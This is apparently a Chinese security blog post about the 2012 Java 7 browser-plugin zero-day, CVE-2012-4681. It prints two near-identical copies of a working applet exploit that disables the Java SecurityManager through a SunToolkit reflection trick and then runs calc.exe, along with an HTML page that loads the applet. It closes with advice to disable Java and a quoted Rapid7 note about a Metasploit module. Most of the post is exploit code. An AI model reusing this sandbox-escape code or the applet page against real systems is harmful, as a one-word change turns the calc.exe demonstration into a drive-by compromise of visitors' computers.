jre 远程代码执行
产生:
FireEeye在8月27日发布了一个新的java 0day的一些相关信息,该漏洞影响浏览器的JRE[1.7.x]插件,影响非常大,攻击者可利用该漏洞进行挂马攻击,进而控制网民用户的计算机。在捕获的样本中发现使用了Dadong’s JSXX 0.44 VIP加密方式。目前,该漏洞的利用代码已被公开,而官方尚未发布任何补丁;在补丁发布之前,建议用户卸载或禁用JRE(如果安装了JRE)。
报告地址:http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
影响:
此漏洞影响JRE[1.7.x]插件,不影响java 6及以下
受影响浏览器:
包括IE、Firefox、opera、chrome
补丁状态:
目前尚未补丁!
相关代码:
我测试的Java源码
- package test0day;
-
- import java.applet.Applet;
- import java.awt.Graphics;
- import java.beans.Expression;
- import java.beans.Statement;
- import java.lang.reflect.Field;
- import java.net.URL;
- import java.security.AccessControlContext;
- import java.security.AllPermission;
- import java.security.CodeSource;
- import java.security.Permissions;
- import java.security.ProtectionDomain;
- import java.security.cert.Certificate;
-
- public class Gondvv20120828_1 extends Applet {
-
- public Gondvv20120828_1() {
-
- }
- public void disableSecurity() throws Throwable {
- Statement localStatement = new Statement(System.class,
- "setSecurityManager", new Object[1]);
- Permissions localPermissions = new Permissions();
- localPermissions.add(new AllPermission());
- ProtectionDomain localProtectionDomain = new ProtectionDomain(
- new CodeSource(new URL("file:///"), new Certificate[0]),
- localPermissions);
- AccessControlContext localAccessControlContext = new AccessControlContext(
- new ProtectionDomain[] { localProtectionDomain });
- SetField(Statement.class, "acc", localStatement,
- localAccessControlContext);
- localStatement.execute();
- }
-
- private Class GetClass(String paramString) throws Throwable {
- Object arrayOfObject[] = new Object[1];
- arrayOfObject[0] = paramString;
- Expression localExpression = new Expression(Class.class, "forName",
- arrayOfObject);
- localExpression.execute();
- return (Class) localExpression.getValue();
- }
-
- private void SetField(Class paramClass, String paramString,
- Object paramObject1, Object paramObject2) throws Throwable {
- Object arrayOfObject[] = new Object[2];
- arrayOfObject[0] = paramClass;
- arrayOfObject[1] = paramString;
- Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
- localExpression.execute();
- ((Field) localExpression.getValue()).set(paramObject1, paramObject2);
- }
-
- public void init() {
- try {
- disableSecurity();
- Process localProcess = null;
- localProcess = Runtime.getRuntime().exec("calc.exe");
- if (localProcess != null)
- ;
- localProcess.waitFor();
- } catch (Throwable localThrowable) {
- localThrowable.printStackTrace();
- }
- }
-
- public void paint(Graphics paramGraphics) {
- paramGraphics.drawString("Loading", 50, 25);
- }
- }
网页源码:
- <html>
- <body bgcolor="#0F0F0F">
- <applet code="./test0day/Gondvv20120828_1.class" width="300" height="200" alt="抱歉,您的浏览器不支持Java applet" align="center" vspace="20"></applet>
- </body>
- </html>
网络中java源码:
-
-
-
-
-
-
-
-
-
-
-
- package cve2012xxxx;
-
- import java.applet.Applet;
- import java.awt.Graphics;
- import java.beans.Expression;
- import java.beans.Statement;
- import java.lang.reflect.Field;
- import java.net.URL;
- import java.security.*;
- import java.security.cert.Certificate;
-
- public class Gondvv extends Applet
- {
-
- public Gondvv()
- {
- }
-
- public void disableSecurity()
- throws Throwable
- {
- Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
- Permissions localPermissions = new Permissions();
- localPermissions.add(new AllPermission());
- ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
- AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
- localProtectionDomain
- });
- SetField(Statement.class, "acc", localStatement, localAccessControlContext);
- localStatement.execute();
- }
-
- private Class GetClass(String paramString)
- throws Throwable
- {
- Object arrayOfObject[] = new Object[1];
- arrayOfObject[0] = paramString;
- Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
- localExpression.execute();
- return (Class)localExpression.getValue();
- }
-
- private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
- throws Throwable
- {
- Object arrayOfObject[] = new Object[2];
- arrayOfObject[0] = paramClass;
- arrayOfObject[1] = paramString;
- Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
- localExpression.execute();
- ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
- }
-
- public void init()
- {
- try
- {
- disableSecurity();
- Process localProcess = null;
- localProcess = Runtime.getRuntime().exec("calc.exe");
- if(localProcess != null);
- localProcess.waitFor();
- }
- catch(Throwable localThrowable)
- {
- localThrowable.printStackTrace();
- }
- }
-
- public void paint(Graphics paramGraphics)
- {
- paramGraphics.drawString("Loading", 50, 25);
- }
- }
测试结果:
解决方案:
见链接:http://www.java.com/zh_CN/download/help/enable_browser.xml
以下来源:https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day
The above example is a successful attack against a fully patched Windows 7 SP1 with Java 7 Update 6. We have also tested the module against the following environments:
- Mozilla Firefox on Ubuntu Linux 10.04
- Internet Explorer / Mozilla Firefox / Chrome on Windows XP
- Internet Explorer / Mozilla Firefox on Windows Vista
- Internet Explorer / Mozilla Firefox on Windows 7
- Safari on OS X 10.7.4
As a user, you should take this problem seriously, because there is currently no patch from Oracle. For now, our recommendation is to completely disable Java until a fix is available.
To try out this exploit: Get your free Metasploit download now, or update your existing installation. Meanwhile, we will keep this blog updated when more progress has been made.
Aug 28 2012: This vulnerability has been assigned as CVE-2012-4681.